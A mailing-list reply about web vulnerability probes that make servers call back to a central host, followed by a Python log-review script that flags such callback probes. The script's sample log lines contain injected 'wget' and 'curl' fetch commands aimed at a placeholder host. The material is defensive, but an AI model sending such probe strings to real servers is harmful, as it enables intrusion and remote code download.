On 5/9/2011 11:09 AM, Scott Silva wrote:
on 5/8/2011 10:46 AM Jason spake the following:
Hi All,
I want to know thoughts on if I am being too paranoid/security conscious.
<snip>
You know what they say; "Just because you are paranoid does not mean that someone is NOT out to get you!"
I think the currently fashionable way to probe for vulnerabilities is to send URLs that will execute something that will contact a central server if they succeed, so it doesn't really matter what you do in the way of blocking/redirecting, etc. They are probably going to ignore the return status and are already running on distributed compromised hosts. At least that's the sort of thing I see regularly trying to exploit a Struts vulnerability in our Java web server's logs.
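As an added illustration of the point in the message above (not code from the thread or its participants): because such probes arrive from many compromised hosts and ignore the response, a log review can group requests by the external host embedded in the URL rather than by client IP. The log lines, host names and the function name `callback_probes` are constructed for this sketch, and Apache combined log format is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines; IPs and hosts are documentation
# placeholders, not real indicators.
SAMPLE_LOG = """\
198.51.100.7 - - [09/May/2011:10:01:02 -0500] "GET /app/login.action?x=wget%20http%3A%2F%2Fcollector.example%2Fp%3Fid%3D1 HTTP/1.1" 404 312
203.0.113.9 - - [09/May/2011:10:04:40 -0500] "GET /app/list.action?q=curl+http://collector.example/p HTTP/1.1" 403 199
192.0.2.44 - - [09/May/2011:10:05:13 -0500] "GET /app/view.action?next=http://www.example.org/help HTTP/1.1" 200 5120
192.0.2.45 - - [09/May/2011:10:06:00 -0500] "GET /index.html HTTP/1.1" 200 1043
"""

# client IP, request target and status from a combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
# host part of any URL that appears inside the decoded query string
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)', re.I)


def callback_probes(log_text, own_hosts=frozenset()):
    """Map each external host embedded in a request to the client IPs
    that sent it and the status codes the server answered with."""
    hits = defaultdict(lambda: {"sources": set(), "statuses": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        source, target, status = m.groups()
        # decode %xx and '+' so encoded URLs are visible to the regex
        query = unquote_plus(urlsplit(target).query)
        for host in URL_RE.findall(query):
            host = host.lower()
            if host in own_hosts:
                continue  # e.g. a redirect parameter pointing at our own site
            hits[host]["sources"].add(source)
            hits[host]["statuses"].add(int(status))
    return dict(hits)


if __name__ == "__main__":
    for host, info in callback_probes(SAMPLE_LOG, {"www.example.org"}).items():
        print(host, sorted(info["sources"]), sorted(info["statuses"]))
```

The hosts this returns are the ones to look for in outbound firewall or proxy logs, since a connection from the server to that host is the only success signal such a probe relies on.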